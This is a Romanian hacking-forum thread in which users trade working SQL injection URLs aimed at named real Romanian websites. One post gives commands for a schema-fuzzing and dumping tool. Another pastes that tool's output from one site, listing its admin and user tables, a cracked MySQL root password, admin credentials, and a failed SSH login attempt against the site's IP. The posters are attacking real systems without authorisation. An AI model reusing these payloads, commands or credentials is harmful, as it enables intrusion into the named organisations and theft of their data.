Jump to content
Flubber

SQL Injection

Recommended Posts

Salut baieti,

am incercat SQL Injection in: http://proiecte.nipne.ro/ am aflat ca foloseste versiunea 4 ( http://proiecte.nipne.ro/pn2/index_en.php?id=1+AND+1=0+UNION+SELECT+ALL+concat_ws(0x3a,version(),user(),database())-- ) si am ajuns la stadiul unde trebuie sa ghicesc numele tabelului ( http://proiecte.nipne.ro/pn2/index_en.php?id=-1+UNION+SELECT+ALL+group_concat(schema_name)+from+information_schema.schemata-- ) ...

putin ajutor?

P.S.: daca nu am postat unde trebuia, rog un moderator/administrator sa imi mute post-ul si topic-ul, multumesc

Link to comment
Share on other sites

altul: http://www.apd.ro/publicatie.php?id=51+AND+1=0+UNION+SELECT+ALL+1,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12--

+ http://www.apd.ro/admin/login.php , aoleuu xD

iar la ghicit coloane? are cineva un script care sa "rasfoiasca" (sa incerce diferite nume de coloane)

sau ce script-uri anume speciale de SQL Injection aveti? ce imi recomandati?

off: urasc ca nu pot sa schimb semnatura :(

Link to comment
Share on other sites

http://www.darkc0de.com/others/schemafuzz.py

python schemafuzz.py --fuzz -u "http://www.site.com/index.php?id=1"

dupa ce iti gaseste:

python schemafuzz.py --dump -u "http://www.site.com/index.php?id=1" -D database -T table -C column1,column2...column999

omu vad ca stie sa faca interogari si din browser. hai sa ne cacam in sus ca vezi doamne scripturile sunt naspa...te indobitocesc...my ass

Link to comment
Share on other sites

http://www.darkc0de.com/others/schemafuzz.py

python schemafuzz.py --fuzz -u "http://www.site.com/index.php?id=1"

dupa ce iti gaseste:

python schemafuzz.py --dump -u "http://www.site.com/index.php?id=1" -D database -T table -C column1,column2...column999

omu vad ca stie sa faca interogari si din browser. hai sa ne cacam in sus ca vezi doamne scripturile sunt naspa...te indobitocesc...my ass

super, multumesc mult, in sfarsit ceea ce asteptam desi TinKode are dreptate (stie el ce zice)

Link to comment
Share on other sites

Guest Praetorian

Ma Caracal, nu am zis ca scripturile sunt naspa...

Dar care mai este farmecul, cand tu doar bagi in cmd niste cuvinte si iti face toata treaba...

Una e cand dai scan dupa ele, apoi le faci cu diferite scripturi, decat cand cauti singur sa vezi daca e vulnerabil, si sa faci TU injectia manual.

Link to comment
Share on other sites

http://www.aries.ro - vulnerabil

[+] URL:http://www.aries.ro/index.php?lang_id=2+AND+1=2+UNION+SELECT+darkc0de--

[+] Evasion Used: "+" "--"

[+] 02:20:54

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: aries_site

User: root@localhost

Version: 5.0.67

[+] Number of tables names to be fuzzed: 347

[+] Number of column names to be fuzzed: 277

[+] Searching for tables and columns...

[+] Found a table called: admin

[+] Now searching for columns inside table "admin"

[!] Found a column called:user

[!] Found a column called:pass

[!] Found a column called:id

[-] Done searching inside table "admin" for columns!

[+] Found a table called: company

[+] Now searching for columns inside table "company"

[!] Found a column called:id

[!] Found a column called:login

[-] Done searching inside table "company" for columns!

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table "mysql.user" for columns!

[+] Found a table called: news

[+] Now searching for columns inside table "news"

[!] Found a column called:id

[-] Done searching inside table "news" for columns!

[+] Found a table called: users

[+] Now searching for columns inside table "users"

[!] Found a column called:password

[!] Found a column called:id

[!] Found a column called:email

[!] Found a column called:login

[-] Done searching inside table "users" for columns!

[-] [02:36:10]

[-] Total URL Requests 1733

[-] Done

am obtinut:

user,pass din mysql.user

root:3c8c1a8e271e4bad (MySQL Hash) ---> root:toor

inca ceva: www.aries.ro/admin (user,id,pass din admin -> user: admin ; id: admin ; pass: 1)

am mai descoperit ca te poti conecta la aries.ro (prin DNS ip-ul este: 194.102.253.145) prin SSH 22, am incercat user-ul root, pass toor (din decriptarea hash-ului de mai sus) dar nu a mers.... acum am o nelamurire, toate userele astea unde le pot folosi? (nici la /admin nu au mers)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...